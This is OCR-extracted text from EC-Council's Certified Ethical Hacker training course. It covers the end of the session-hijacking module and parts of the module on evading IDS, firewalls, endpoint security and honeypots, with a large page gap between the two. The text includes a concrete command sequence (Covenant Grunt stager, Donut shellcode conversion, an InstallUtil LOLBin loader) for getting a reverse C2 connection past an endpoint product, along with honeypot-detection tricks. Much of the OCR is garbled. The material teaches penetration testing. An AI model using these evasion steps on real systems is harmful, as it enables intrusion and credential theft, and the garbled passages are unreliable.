Figure 11.46: Screenshot of Fiddler

The following are some additional session hijacking prevention tools:

=

Nessus (https://www.tenable.com)

=

Invicti (https://www.invicti.com)

=

Wapiti (https://wapiti-scanner.github.io)

=

WebWatchBot (https://www.exclamationsoft.com)

Module 11 Page 1601

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Module Summary Oo

Q

=

CEH

inthis module, we have discussed the following:

> Session hijacking concepts and different types of session hijacking ,

>

Application-level and network-level session hijacking attacks

> Various session hijacking tools

> Howto detect, protect, and defend against session hijacking attacks, as well as various session hijacking detection and prevention tools > We concluded with a detailed discussion on various countermeasures to be employed to prevent session hijacking attempts by threat actors

Q Inthe next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, evade network security components such as IDSs and firewallsto compromise the infrastructure

Module Summary In this module, we discussed concepts related to session hijacking, along with different types of session hijacking. We also discussed in detail application-level and network-level session hijacking attacks. Furthermore, various session hijacking tools were presented. We also discussed how to detect, protect, and defend against session hijacking attacks, in addition to various session hijacking detection and prevention tools. We concluded with a detailed discussion on various countermeasures to be employed to prevent session hijacking attempts by threat actors. In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen testers, evade network security components such as IDSs and firewalls to compromise network

infrastructure.

Module 11 Page 1602

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

C'EH

Certified

Ethical

EC-Council

Hacker

MODULE 12

—— EVADING IDS, FIREWALLS, —— ¢ AND HONEYPOTS

EC-COUNCIL OFFICIAL CURRICULA

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

CEH

LO#01: Summarize IDS, IPS, Firewall, and Honeypot

Concepts

© LO#02: Demonstrate IDS, IPS, Firewall, and Honeypot Solutions

o

© LO#03: Demonstrate Different Techniques to Bypass IDS

o

o

LEARNING

OBJECTIVES

LO#05: Demonstrate Different Techniques

to Bypass NAC and Endpoint Security

© LO#06: Use IDS/Firewall Evading Tools © LO#07: Demonstrate Different Techniques to Detect Honeypots

LO#04: Demonstrate Different Techniques to Bypass Firewalls

LO#08: Explain IDS/Firewall Evasion Countermeasures

Copyright © by

Al RightsReserved, Reproduction

i Strictly Prohibited.

Learning Objectives The widespread use of the Internet throughout the business world has boosted network usage in general. Organizations adopt various network security measures such as firewalls, intrusion detection systems (IDS), intrusion prevention systems (IPS), and “honeypots” to protect their networks. Networks are the most preferred targets of hackers for compromising an organization’s security, and attackers continue to find new ways to evade network security measures and attack these targets. This module provides deep insights into various network security technologies, such as IDS, IPS, firewalls, and honeypots. It explains the operations of these components as well as the various techniques used by attackers to evade them. Further, it describes the countermeasures necessary to prevent such attacks. At the end of this module, you will be able to: =

Describe IDS, IPS, firewall, and honeypot concepts

=

Use different IDS, IPS, firewall, and honeypot solutions

=

Explain different techniques to bypass IDS

=

Explain various techniques to bypass firewalls

=

Explain various techniques to bypass NAC and endpoint security

=

Use different tools to evade IDS/firewalls

=

Explain different techniques to detect honeypots

=

Adopt countermeasures against IDS/firewall evasion

Module 12 Page 1605

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

CEH

LO#01: Summarize IDS, IPS, Firewall, and Honeypot Concepts

Copyright © by

All RightsReserved. Rep

Strictly Prohibited

IDS, IPS, Firewall, and Honeypot Concepts Ethical hackers should have an idea about the function, role, placement, and design of firewalls, IDS, IPS, and honeypots to protect an organization’s network by understanding how an attacker evades such security measures. This section provides an overview of these basic concepts.

Module 12 Page 1606

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

Intrusion Detection System (IDS) ‘@

Anintrusion detection system

How an IDS Works

(IDS) is a software system or

hardware device that inspects all inbound and outbound network traffic for suspicious patterns that may indicatea network or system security breach @

CEH Signature File Comparison

r

Alarmnotifies admin and padet

The IDS checks traffic for

canbe dropped

signatures that match known intrusion patterns and signals

>

an alarm when a match is found

coon

@ Depending on the trafficto be monitored, the IDS is placed outside/inside the firewall to monitor suspicious

traffic

originating from outside/inside the network

eased

‘eut down from that IP source

Stateful Protocol Analysis

Packets dropped

Enterprise Network

Intrusion Detection System (IDS) An intrusion detection system (IDS) is a security software or hardware device used to monitor, detect, and protect networks or systems from malicious activities; it alerts the concerned security personnel immediately upon detecting intrusions. IDS are extremely useful as they monitor the inbound/outbound traffic of the network and check for suspicious activities continuously to detect a network or system security breach. Specifically, they check traffic for signatures that match known intrusion patterns and raise an alarm when a match is detected. IDS can be categorized into active and passive IDS depending on their functionality. A passive IDS generally only detects intrusions while an active IPS not only detects intrusions in the network but also prevents them. Main Functions of IDS: =

An IDS gathers and analyzes information from within a computer or a network to identify possible violations of the security policy, including unauthorized access, as well as misuse.

=

An IDS is also referred to as a “packet sniffer,” which intercepts packets traveling via various communication media and protocols, usually TCP/IP.

=

The packets are analyzed after they are captured.

=

An IDS evaluates traffic for suspected such intrusions.

intrusions and

raises an alarm

upon

detecting

Where IDS resides in the network One of the most common places to deploy an IDS is near the firewall. Depending on the traffic to be monitored, an IDS is placed outside/inside the firewall to monitor suspicious traffic Module 12 Page 1607

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

originating from outside/inside the network.

When

placed inside, the IDS will be ideal if it is

near a DMZ; however, the best practice is to use a layered defense by deploying one IDS in front of the firewall and another one behind the firewall in the network. Before deploying the IDS, it is essential to analyze the network topology, understand how the traffic flows to and from the resources that an attacker can use to gain access to the network, and identify the critical components that will be possible targets of various attacks against the network. After the position of the IDS in the network is determined, the IDS must be configured to maximize its network protection effect.

IDS/IPS

User

Intranet Figure 12.1: Placement of IDS

How an IDS Works The primary purpose of the IDS is to provide real-time monitoring and detection of intrusions. Additionally, reactive IDS (and IPS) can intercept, respond to, and/or prevent intrusions. An IDS works as follows: =

IDS have sensors to detect malicious signatures in data packets, and some advanced IDS include behavioral activity detection to detect malicious traffic behavior. Even if the packet signatures do not match perfectly with the signatures in the IDS signature database, the activity detection system can alert administrators about possible attacks.

=

If the signature matches, the IDS performs predefined actions such as terminating the connection, blocking the IP address, dropping the packet, and/or raising an alarm to notify the administrator.

=

When signature matches, anomaly detection will be skipped; otherwise, the sensor may analyze traffic patterns for an anomaly.

=

When the packet passes all the tests, the IDS will forward it to the network.

Module 12 Page 1608

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

IDS Preprocessor Signature File

Comparison

“>|

Signature File Internet

Router

Database

Firewall

4

Anomaly

Alarm notifies admin and packet can be dropped

Detection

Action Rule

Stateful Protocol

Cisco log sever

PAS

Connections are cut down from that IP source

Analysis

Enterprise Network

®*'S)

Packet is

| GruntHTTP

DotNetversion +| Neto »

Vahdatecen True

UseCentPinning +| Tue

.

Delay

siterPercent

Connectaitempts

xilloate

“& Download | Figure 12.71: Screenshot of Covenant C2 Framework

Module 12 Page 1748

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots =

Exam 312-50 Certified Ethical Hacker

Step 2: Use the Donut tool to transform payload into position-independent shellcode: ./donut

-c

GruntStager

-a

3

-b

2

-z

2

-x

-e

3

GruntHTTP.exe

-o

gruntloader.bin

Red_Teaming/donut® ./donut -c GruntStager -a

3 -b 2 -

~e 3 GruntHTTP.exe

-o gruntloader.bin

Donut shellcode generator v0.9.3

Copyright (c) 2019 TheWover, Odzhan

Instance type : Embedded Module file “GruntHTTP.exe" Entre : Random names + Encryption Compressed aPLib (Reduced by 55%) File type 2 .NET EXE Target CPU: x86+amd64 AMSI/WOLP jort Shellcode “gruntloader.bin* Red Teaming/donut# Figure 12.72: Screenshot of Donut

=

Step 3: Employ a custom generated above: file

.NET

Custom_Loader_SEP.cs

[custom_Loader_sEP.cs: [customLoader.exe:

A:

loader or

to

run

the

position-independent

shellcode

CustomerLoader.exe

Loader_SE! \ce:System. Configuration. Install.dll -sdk:4 -out:CustomLoader.exe Custom_Loader_SEP.cs

PE32 executable (console) Intel 80386 Mono/.Net

assenbly, for MS Windows

Figure 12.73: Screenshot showing loader compilation

=

Step 4: Run the loader using InstallUtil.exe as a LOLBin to execute the shellcode in the system memory to create a reverse C2 connection evading the SEP solution:

0;000003e7) 0 0 34870 wr aumiontty ssa Token + (0;000c0c27) 1 0 S782 ULasenven\saninistrator

Figure 12.74: Extracting system credentials bypassing the SEP solution

Module 12 Page 1749

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

Other Techniques for Bypassing Endpoint Security Hosti

ostin Stes

Phishin

g

Passing Encoded Commands

Fast Flux DNS Method

Timing-based

Evasion

. Signed Binary= Proxy Execution

CE H

@ EDR uses blacklistedIP addresses that are regularly updated through multiple sources @

Most cloud infrastructure

services are not listed in the blacklist; therefore, attackers exploit this feature to

host phishing websites on popular cloud infrastructures such as Google Cloud and AWS

© Attackers sendcommands encodedwith, for example, Base64to cover their arguments and code to evade EDR detection @ Attackersalso use hex-format encryption to ping different IP addressesto evade detection

© The Fast Flux method allows attackers to change both the IP addresses and DNS names rapidly

© Ithelpsthe attackers circumvent blacklists and hide the C&C server behind the compromised systems operatingas reverse proxies

©

Itisa sandbox evasion technique where malware is executed duringa specifictime or after certain actions

performed by the victim

© Forexample, usingsleep patching, delay APIs, and time bombs © Attackers leverage trusted in-built utilities such as rundll.32 for the execution of malicious codes to evade the EDR solutions

© The legitimate utilities are signed with digital certificates and help in proxyingthe malicious code execution Stcty Prohibited

Other Techniques for Bypassing Endpoint Security Attackers use various evasion techniques to maintain persistence on a compromised system by avoiding different sandboxing services, UBA or SIEM solutions, which generate behavior-based alerts. They evade various security controls of a network after compromising a system for maintaining stealth and expanding malicious activities. Organizations may use different security controls such as IDS, IPS, or EDRs, but attackers can also implement various techniques to hide their activities and remain undetected. Therefore, to evade both behavior-based EDR tools, attackers take advantage of sophisticated mechanisms and advanced malware to hide their malicious operations. =

Hosting Phishing Sites on Popular Infrastructure The EDR mechanism used in organizations can block the IP addresses involved in phishing campaigns and other malicious activities to protect the end device. It uses blacklisted IP addresses that are regularly updated through multiple sources. Attackers exploit this feature and use legitimate website hosting cloud infrastructure services such as Google Cloud and AWS to host phishing websites and perform phishing attacks against the target organizations. The endpoint security implemented on the end devices can only prevent users from malicious IP addresses registered in the blacklist. Most popular hosting infrastructure services are not listed in the blacklist; therefore, attackers use them as command and control servers to perform malicious activities. Attackers can also use popular social media accounts to distribute malware by hiding malicious code in the uploaded photos or other multimedia files using steganography. Already infected malware reads the instructions hidden in the photos and acts accordingly to evade the endpoint security on the target system.

Module 12 Page 1750

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots =

Passing Encoded Commands Attackers can pass encrypted commands to circumstances. For example, passing Base64 cover their arguments and code. Attackers different IP addresses for avoiding detection

=

Exam 312-50 Certified Ethical Hacker

bypass the detection mechanisms in specific encoded commands will allow attackers to can also use hex-format encryption to ping by security mechanisms.

Fast Flux DNS Method Attackers can implement malware that uses various tricks for executing code that cannot be detected by security solutions. The fast flux method allows attackers to change both the IP addresses and DNS names rapidly, and is typically utilized by large botnets. This technique allows attackers to evade various security controls. It also helps the attacker to circumvent blacklists and hide the C&C server behind the compromised systems operating as reverse proxies. In this process, a victim system will only connect to the fast flux agents instead of the legitimate C&C server.

=

Timing-based Evasion This is a sandbox evasion technique where malware is executed during a specific time or after certain actions by the victim. The actions may include opening a particular window and clicking it, which activates it after the system reboots. Some other examples are sleep patching, delay APIs, and time bombs.

=

Signed Binary Proxy Execution This technique allows attackers to leverage trusted in-built utilities for the execution of malicious codes to evade EDR solutions. Attackers use these legitimate or trusted utilities because they are signed with digital certificates and help in proxying the malicious code execution. For example, attackers can take the advantage of rund11.32 for executing malicious commands.

Module 12 Page 1751

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

CEH

LO#06: Use IDS/Firewall Evading Tools

tly Prohibited.

IDS/Firewall Evading Tools Traffic IQ Professional Traffic 1Q Professional generates custom attack traffic which allows

attackers to bypass the installed perimeter devices in the target

&

N map nps://omap.org

Ei

Metasploit

network

‘https://www.metasploit.com

Inundator

(Q._hnttosi//sourceforge.net

FQ

ntpsi//ww.ioppcom.com

1DS-Evasion

naps: att.com

Hyperion-2.3.1

‘htps://mullsecurity.net

Stcty Prohibited

IDS/Firewall Evading Tools During firewall evasion, attackers use various security-auditing tools that assess firewall behavior. This section lists some of these tools that help attackers to bypass firewall restrictions. They automate the process of bypassing firewall rules while increasing effectiveness and consuming less time.

Module 12 Page 1752

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots =

Exam 312-50 Certified Ethical Hacker

Traffic 1Q Professional

Source: https://www.idappcom.com Traffic 1Q Professional is a tool that audits and validates the behavior of security devices by generating the standard application traffic or attack traffic between two virtual machines. This tool is generally used by security personnel for assessing, auditing, and testing the behavioral characteristics of any non-proxy packet-filtering device, which can include application firewalls, IDS, IPS, routers, switches, etc. However, as this tool can generate custom attack traffic, it is extensively employed by attackers to bypass the installed perimeter devices in the target network.

(@ idappcom - Tati Profesional - Fre Licence: 15 days remaining Bie Hep Gre yp come EGY= san GP one 5 BDirpor |

[ee

vey O

-

tar (svt | =BEL, tes BI set Tole Replay

rae @ 8

Soactre ers 1601 100 Pat

7 PPrgenfies rog les (6) oer ee

teracom on Secue pte B Googe © Hess Intell tla ineret Egle Iromsion Bove fon S Common atl Festay le 10Pro 0) Help Flee ty a Mogreo Sofwore 5O eee MDS cebu Aenae seSern (Cy Microsott Mees iron Ofce Merest SOL Serve GyG NeroehNET

ena one ao

Casale rersess02te0 Foto

econ

&

[Backdoor X}100 1.05 kar Bectcn: Rebate $tar stan SxS ecko: AckCnd Sk Bactcee AckCnd kapose Ans Becket Backdoor Ala pcanar Here coh Bockdoo ArerdeS pez Fa hans ASL Bectcot AOL Aan10S Seep Becket Backdoor Aayin ke [Backdoor Asylum 1.05 poap Bockdoo Asan 195 kerpea Bectcer aghen 13S volun shox BeckdooBFBF Evelnon Boctcne Bsctdea Beck Oncesoct ts Bock Back OtceSceao Bectdoo Backage 31 ta Bockdoo 31.1 Speso2S kar Bectcet Bachage Bocconmucton | Backdoor BackConstruction 1.2S.pcap Becker Beciconectn 18S ha Bectcoo BockConct BacConmacta Bock: Backtonencto Becton

BS cstrensnee

‘Adopter Statue

i

x

0

Eereeree

Tile Sau Fara Wcire Bs etree -

I

|

Packet Slat

Figure 12.75: Screenshot of Traffic 1Q Professional

Some additional IDS/firewall evasion tools are as follows: =

Nmap (https://nmap.org)

=

Metasploit (https://www.metasploit.com)

=

Inundator (https://sourceforge.net)

=

IDS-Evasion (https://github.com)

=

Hyperion-2.3.1 (https://nullsecurity.net)

Module 12 Page 1753

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

|

Packet Fragment Generator Tools |

CEH

Colasoft Packet Builder

|

| packets. Attackers use this tool to create custom malicious packets and fragment | them in such a way that firewalls will not detect them

| |

| colasot Packet Builder is used to create custom network packets and fragmenting

CommView

| & |

NetScanTools Pro

s/s eteconookcom Ostinato ps /festnat.org

&

tater

tps://wru.colsofecom

WAN Killer [O,ps:/faneu.solarwinds.com

WireEdit secon wire ction is Stitly Profibited.

Packet Fragment Generator Tools There are various packet fragment generators that attackers use to perform attacks on firewalls to bypass them.

=

fragmentation

Colasoft Packet Builder Source: https://www.colasoft.com Colasoft Packet Builder is used to create custom network packets and fragmenting packets. Attackers use this tool to create custom malicious packets and fragment them such that firewalls cannot detect them. They can create custom network packets such as Ethernet Packet, professionals use intruders.

Module 12 Page 1754

ARP Packet, IP Packet, TCP Packet, and UDP Packet. Security this tool to check your network’s protection against attacks and

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Evading IDS, Firewalls, and Honeypots ® Colasoft Packet Builder File Edit Send Help @ #@#\¢@ ¢@\o Import Export Add Insert | Copy

MY destination Address WY source address BP Protocol 7; Prordnare Type

-

o

x

» © ® | @ Send Send All Adapter About

@. 208000000 Second FPR IFRLERSER IEE :00:00:00:00:00 } :

Figure 12.76: Screenshot of Colasoft Packet Builder

Some additional packet generator tools are listed below: =

CommView (https://www.tamos.com)

=

NetScanTools Pro (https://www.netscantools.com)

=

Ostinato (https://ostinato.org)

=

WAN Killer (https://www.solarwinds.com)

=

WireEdit (https://omnipacket.com)

Module 12 Page 1755

Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohib

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

CEH

LO#07: Demonstrate Different Techniques to Detect Honeypots

Copyright © by

Reproduction is Strictly Prohibited

Detecting Honeypots

CE H

@ Attackers can determine the presence of honeypots by probing the services running on the system @ Attackers craft malicious probe packets to scan for services such as HTTP over SSL (HTTPS), SMTP over SSL (SMPTS), and IMAP over SSL (IMAPS)

@ Ports that show a specific service running but deny a three-way handshake connection indicate the presence ofa honeypot Tools to detect honeypots:

©

Send-safe Honeypot Hunter (http://www.send-safe.com)

© kippo_detect (https://github.com)

Note: Attackers can alsodefeat the purposeof honeypots by using multi-proxies (TORs) and hiding their conversation using encryption and steganography techniques AlRights Reserved. Reproduction i Stcty Prohibited

Detecting Honeypots Honeypots are traps set to detect, deflect, or counteract unauthorized intrusion attempts. While attempting to break into the target network, attackers perform honeypot detection using various tools and techniques. This section discusses these tools and how they are used. A honeypot is an Internet system designed primarily for diverting attackers by tricking or attracting them during their attempts to gain unauthorized access to information systems. Module 12 Page 1756

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

Attackers can determine the presence of honeypots by probing the services running on the system. Attackers use honeypot detection systems or methods to identify the honeypots installed on the target network. They craft malicious probe packets to scan for services such as HTTP over SSL (HTTPS), SMTP over SSL (SMPTS), and IMAP over SSL (IMAPS). Ports that show a particular service running but deny a three-way handshake connection indicate the presence of a honeypot. Once they detect honeypots, attackers try to bypass them so that they can focus on targeting the actual network. Tools to detect honeypots include Send-safe Honeypot Hunter (http://www.send-safe.com) and kippo_detect (https://github.com). Note: Attackers can also defeat honeypots by using multi-proxies conversation using encryption and steganography techniques.

Module 12 Page 1757

(TORs)

and

hiding their

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

Detecting and Defeating Honeypots

CEH

Detecting the presence | @ Observe of rT Tar Pits the latency of the response from the service

Detectingthe presence | @ Analyze the TCP window size, where tar pits continuously acknowledge Incoming packets of Layer 4 Tar Pits

Detecting the presence

of Layer 2 Tar Pits

Detecting running on HoneyPots VMware

even though the TCP window size is reduced

to zero

@ fan attacker is present on the same network as the Layer 2 tar pits, then the attacker can detect the presence of this daemon by looking at the responses with unique MAC address 0:0:f:ff:ff:ff which act as a kind of black hole

|

| & observe the IEEE standards for the current range of MAC addresses assigned to VMWare inc.

Detecting presence || © Perform time-based TCP Finger printing methods (SYN Proxy behavior) GfHoneyd theHoneypot Copyright © by

AlIRights Reserved. Reproduction i Strictly Prohibited

Detecting and Defeating Honeypots (Cont’d) Detecting the presence * ofUser-ModeLinux (UML) Honeypot

Detecting ihe presence of

Sobek

bases

Honeypots

|

|

CE H

@ Analyze the files such as /proc/mounts, /proc/interrupts, and /proc/cmdline, which contain UML-specific information |@ Sebek logs everything that is accessed via read() before transferring it to the network, causing the congestion effect. Analyze the congestion in the network layer

Detecting the presence of Snort_inline Honeypot

| @ Analyze the outgoing packets by capturing the Snort_inline modified packets through another host system and identifying the packet modification

Detecting the presence of Fake AP

Fake access points only send beacon frames and do not generate any fake traffic on the | |@ access points and an attacker can monitor the network traffic and easily notice the presence of a fake AP

Detecting the presence of Bait and Switch Honeypots

| |G Observe specific TCP/IP parameters such as Round-Trip Time (RTT), the Time To Live (TTL), and the TCP timestamp is Strictly Prohibited

Detecting and Defeating Honeypots A honeypot is a security mechanism that is deployed to counterattack and trap attackers. Honeypots lure attackers into performing malicious activities, and this attack information provides insights into the level and type of threats a network infrastructure can face. As an attacker, determining whether the target system is a legitimate one or a honeypot is essential to compromise the network without being detected. Identifying and defeating these honeypot establishments stealthily is the fundamental task of a professional hacker. Module 12 Page 1758

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots Some techniques discussed below:

Exam 312-50 Certified Ethical Hacker

used to identify,

detect,

and

defeat various

honeypot

infrastructures are

Detecting the presence of Layer 7 Tar Pits: Tar pits are security entities that are similar to honeypots, which are designed to respond slowly to incoming requests. They slow down unauthorized attempts of hackers. Layer 7 tar pits react slowly to incoming SMTP commands by attackers/spammers. Attackers can identify the presence of Layer 7 tar pits by looking at the latency of the response from the service. Detecting the presence of Layer 4 Tar Pits: Layer 4 tar pits manipulate the TCP/IP stack and are effectively employed to slow down the spreading of worms, backdoors, etc. In these tar pits, the iptables accept the incoming TCP/IP connection and spontaneously switch to a zero-window size, blocking the attacker from sending further data. This connection cannot be terminated by the attacker, as no data is transferred to the target machine. Layer 4 tar pits such as Labrea can be identified by the attacker by analyzing the TCP window size, where the tar pit continuously acknowledges incoming packets even though the TCP window size is reduced to zero. Detecting the presence of Layer 2 Tar Pits: If an attacker launches an attack from the same network, the issue of Layer 2 arises. Layer 2 tar pits are used to block the network penetration of the attacker who gains access to the network as well as to prevent internal threats. The attacker can detect the presence of this daemon by looking at the responses with the unique MAC address 0:0:f:ff:ff:ff, which acts as a kind of black hole. An attacker can also identify the presence of these tar pits by analyzing the ARP

responses.

Detecting Honeypots running on VMware: VMWare is a commercially available virtual machine that is used to launch multiple instances of an OS simultaneously. These virtual machines can be configured with various virtual machine resources such as CPU, memory, disks, I/O devices, etc. Owing to its numerous advantages, VMWare is widely used to launch honeypots. Attackers can identify instances that are running on the VMWare virtual machine by analyzing the MAC address. By looking at the IEEE standards for the current range of MAC addresses assigned to VMWare Inc., an attacker can identify the presence of VMWare-based honeypots. Detecting the presence of Honeyd Honeypot: Honeyd is a widely used honeypot daemon. It is used to create thousands of honeypots easily. It is a network-simulated and service-simulated honeypot deployment engine. This honeyd honeypot can respond to a remote attacker who tries to contact the SMTP service with fake responses. Echo “220 intranet ESMTP sendmail 8.1” While read data 4 if data ~ “HELO” then if data ~ “MAIL FROM” then.

Attacker Figure 12.77: Honeyd fake response

Module 12 Page 1759

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

An attacker can identify the presence of honeyd honeypot by performing time-based TCP fingerprinting methods (SYN proxy behavior). The following figure shows the difference between a response to a normal computer and the response of honeyd honeypot to a manual SYN request sent by an attacker.

TIMEOUT

a

Figure 12.78: Response to SYN request by normal computer vs. Honeyd Honeypot

=

Detecting the presence of User-Mode Linux (UML) Honeypot: User-Mode Linux is an open-source software under GNU, which is used to create virtual machines and is efficient in deploying honeypots. Attackers can identify the presence of UML honeypots by analyzing files such as /proc/mounts, /proc/interrupts, and /proc/cmdline, which contain UML-specific information.

=

Detecting the presence of Sebek-based Honeypots: Sebek is a server/client-based honeypot application that captures the rootkits and other malicious malware that hijacks the read() system call. Such honeypots record all the data accessed via reading () call. Attackers can detect the existence of Sebek-based honeypots by analyzing the congestion in the network layer, as Sebek data communication is usually unencrypted. Since Sebek logs everything that is accessed via reading () call before transferring to the network, it causes the congestion effect.

=

Detecting the presence of Snort_inline Honeypot: Snort_inline is a modified version of Snort IDS that is capable of packet manipulation. It can rewrite rules in the iptables and is mainly used in Genll (2nd generation) honeynets to block known attacks and avoid attacker bouncing. Attackers can identify these honeypots by analyzing the outgoing packets. If an outgoing packet is dropped, it might look like a black hole to an attacker, and when the snort_inline modifies an outgoing packet, the attacker can capture the modified packet through another host system and identify the packet modification.

=

Detecting the presence of Fake AP: Fake access points are those that create fake 802.11b beacon frames with randomly generated ESSID and BSSID (MAC address) assignments. Fake access points only send beacon frames but do not produce any fake traffic on the access points, and an attacker can monitor the network traffic and quickly note the presence of fake AP.

=

Detecting the presence of Bait and Switch Honeypots: Bait and switch honeypots actively participate in security mechanisms that are employed to respond quickly to incoming threats and malicious attempts. They redirect all malicious network traffic to a honeypot after any intrusion attempt is detected. An attacker can identify the presence of such honeypots by looking at specific TCP/IP parameters such as the Round-Trip Time (RTT), the Time To Live (TTL), and the TCP timestamp.

Module 12 Page 1760

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

Honeypot Detection Tools: Send-Safe Honeypot Hunter (@ Send-Safe Honeypot Hunter is a tool designed for checking

lists of HTTPS and SOCKS proxies for "honey pots”

[© see ste Honea arte 3228 DEMO * Seta: Ste Abo Pwo check: [C\Pogam Fes pBBiSend Sle Horaypat Hiri DEMOWeatva >| [ZX]

Features:

Checks lists of HTTPS, SOCKS4, and SOCKSS proxies with

any ports

.

Checks several remoteor local proxylists at once

ae

AFstd oes tong ater honest: i tone

Use prories:

Can upload "Valid proxies" and "All except honeypots" files

to FTP isd

Can process proxylists automatically every specified time interval

May be used for usual proxylist validating as well

ante tad

ele

Number recs fF mist Croce: —— check

Litre

Cee



sure at [5

eh

wietetotie

Leplevet (0: NoLonina

Coreckpromketerey 50 nintes (Reda atercheck Powbpe: [AUTO Taae ea eaees : =

y

Tin) fra Send sof cor Strcy Pro

Honeypot Detection Tools Attackers user honeypot detection tools such as Send-Safe Honeypot Hunter (http://www.sendsafe.com) and kippo_detect (https://github.com) to detect honeypots in the target organizational networks.

=

Send-Safe Honeypot Hunter Source: http://www.send-safe.com Send-Safe Honeypot Hunter is a tool designed for checking lists of HTTPS and SOCKS proxies for "honey pots.“ Features:

o

Checks lists of HTTPS, SOCKS4, and SOCKSS5 proxies with any ports

o

Checks several remote or local proxylists at once

o

Can upload "Valid proxies" and "All except honeypots" files to FTP

o

Can process proxylists automatically in every specified period

o

May be used for usual proxylist validating as well

Module 12 Page 1761

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

@ Send-Safe Honeypot Hunter 3.2.28 --- DEMO Settings

Status

-

x

About

Proxylists to check:

[C:\Program Files (x86)\Send-Safe Honeypot Hunter DEMO\texttxt

f

Output

Valid proxies: Failed proxies:

C:\Program Files (x86)\Send-Safe Honeypot Hunter DEMO \goc C:\Program Files (x86)\Send-Safe Honeypot Hunter DEMO \faile

(A Honeypots:

C:\Program Files (x86)\Send-Safe Honeypot Hunter DEMO \hor |

Mall exept honeypots:

[C:\Program Files (x86)\Send-S.afe Honeypot Hunter DEMI

Options Use proxies:

Number of threads: [59 Connection timeout:

|15

Number of etties:

[7

ListenerIP: [192.168.0244 ClientIP: (1921680244

v Vv

remote remote

SMTP Port: | 25

__list.dsblorg

RBL Check:

Save working proxies (before RBL check) to Check RBL first

Check prowylst every Elapsed time: 0.00.00

‘Wiite log to file

30

minutes

Started:

N/A

Loglevel:

0 -No Logging

Restart after check

Proxytype:

Stop

v AUTO

89

Start

Figure 12.79: Screenshot of Send-Safe Honeypot Hunter

Module 12 Page 1762

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

CEH

LO#08: Explain IDS/Firewall Evasion Countermeasures

tly Prohibited.

IDS/Firewall Evasion Countermeasures The previous sections discussed various tools and techniques used by attackers to bypass network security perimeters such as IDS, firewalls, and honeypots to enter target networks. It is necessary to deploy and configure these security mechanisms securely to avoid attacks. This section thus discusses various countermeasures and best practices for hardening such network security perimeters.

Module 12 Page 1763

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

